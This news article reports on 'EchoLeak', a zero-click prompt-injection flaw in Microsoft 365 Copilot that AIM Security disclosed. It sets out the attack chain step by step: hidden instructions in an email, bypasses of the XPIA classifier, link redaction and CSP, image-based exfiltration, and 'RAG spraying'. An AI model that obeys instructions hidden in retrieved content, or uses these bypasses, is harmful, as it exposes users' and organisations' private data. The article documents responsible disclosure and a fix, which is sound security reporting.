
Security researchers at AIM Security have revealed a serious zero-click vulnerability dubbed “EchoLeak.” The flaw targets the AI-powered Microsoft 365 Copilot, allowing cybercriminals to exfiltrate private data from a user’s organizational environment by simply sending a carefully created email.
In a report published this week, AIM Security stated this is the first known “zero-click” AI exploit affecting a major application like Microsoft 365 Copilot, meaning users don’t need to take any action for the attack to be successful.
“The chains allow attackers to automatically exfiltrate sensitive and proprietary information from M365 Copilot context, without the user’s awareness, or relying on any specific victim behavior,” AIM Security explained.
This is made possible by what researchers call a “LLM Scope Violation.” In simpler terms, the flaw tricks Copilot’s underlying AI, which is based on OpenAI’s GPT models, into pulling in private user data after reading malicious instructions hidden in a regular-looking email.
How the attack works
The researchers laid out a detailed, multi-part attack chain that bypasses Microsoft’s existing protections.
- XPIA bypass: Microsoft uses filters known as XPIA classifiers to identify malicious prompts. However, by writing the email in plain, non-technical language that sounds like it’s intended for a human, not an AI, the attacker circumvents these protections.
- Link redaction bypass: Typically, links to external websites are removed; however, AIM Security discovered Markdown link tricks that circumvent redaction. These links send back confidential info in the URL.
- Image trick: Copilot can be tricked into generating image links that trigger automatic browser requests, sending data to the attacker without user clicks.
- CSP Bypass via Microsoft Services: Although Microsoft has security rules in place to block outside images, attackers have found ways to route data through Microsoft Teams and SharePoint, which are allowed domains.
The researchers also discovered how attackers can boost their chances of success using a method called “RAG spraying.” Instead of sending one email, attackers either:
- Send many short emails with slightly different wordings, or
- Send one very long, specially crafted email that gets split into smaller chunks by the AI system.
This tricks the AI into retrieving the malicious message more often during normal use.
What’s at risk?
By design, Microsoft 365 Copilot has access to a wide range of business data, including emails, OneDrive files, Teams chats, internal SharePoint documents, and other relevant data.
Although Copilot is built to follow strict permission models, EchoLeak circumvents these by manipulating how Copilot interprets and responds to user prompts, essentially causing the AI to expose information it shouldn’t.
“An ‘underprivileged email’… should not be able to relate to privileged data… especially when the comprehension of the email is mediated by an LLM,” the researchers stressed.
Microsoft confirms CVE-2025-32711 and mitigates it
Microsoft has confirmed the issue, assigning it CVE-2025-32711, rated “Critical” with a CVSS score of 9.3 out of 10. Microsoft Security Response Center officially described it as, “AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.”
The company said no customer action is required, as the vulnerability has already been fully mitigated on its end. Microsoft also thanked Aim Labs for its responsible disclosure.
Read TechRepublic’s news coverage about this week’s Patch Tuesday, in which Microsoft patched 68 security flaws, including one for targeted espionage.